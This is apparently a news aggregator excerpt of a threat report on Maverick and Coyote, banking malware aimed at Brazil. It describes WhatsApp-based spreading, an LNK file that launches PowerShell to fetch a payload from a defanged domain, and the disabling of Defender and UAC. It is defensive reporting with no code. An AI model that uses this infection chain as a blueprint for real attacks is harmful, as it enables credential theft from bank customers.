"The campaign involves two components: A self-propagating malware referred to as SORVEPOTEL that's spread via the desktop web version of WhatsApp and is used to deliver a ZIP archive containing the Maverick payload. The malware is designed to monitor active browser window tabs for URLs that match a hard-coded list of financial institutions in Latin America. Should the URLs match, it establishes contact with a remote server to fetch follow-on commands to gather system information and serve phishing pages to steal credentials."
"The latest findings from CyberProof show that the ZIP file contains a Windows shortcut (LNK) that, when launched by the user, runs cmd.exe or PowerShell to connect to an external server ("zapgrande[.]com") to download the first-stage payload. The PowerShell script is capable of launching intermediate tools designed to disable Microsoft Defender Antivirus and UAC, as well as retrieve a .NET loader."
Both Coyote and Maverick are .NET banking malware targeting Brazilian users and banks, featuring decrypt routines, banking-URL targeting, and monitoring of banking applications. Both strains can spread via WhatsApp Web and use social-engineered ZIP archives delivered through desktop WhatsApp. Maverick's campaign includes a self-propagating component called SORVEPOTEL that delivers a ZIP containing the Maverick payload. The malware monitors active browser tabs for hard-coded Latin American financial URLs, then contacts a remote server to receive commands to gather system information and serve phishing pages to harvest credentials. A ZIP with an LNK can launch cmd.exe or PowerShell to retrieve a first-stage payload from zapgrande[.]com; the PowerShell can disable Microsoft Defender and UAC and retrieve a .NET loader. Sophos noted possible links to prior Coyote campaigns, and Kaspersky found code overlaps while treating Maverick as a distinct, widespread Brazilian threat.
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]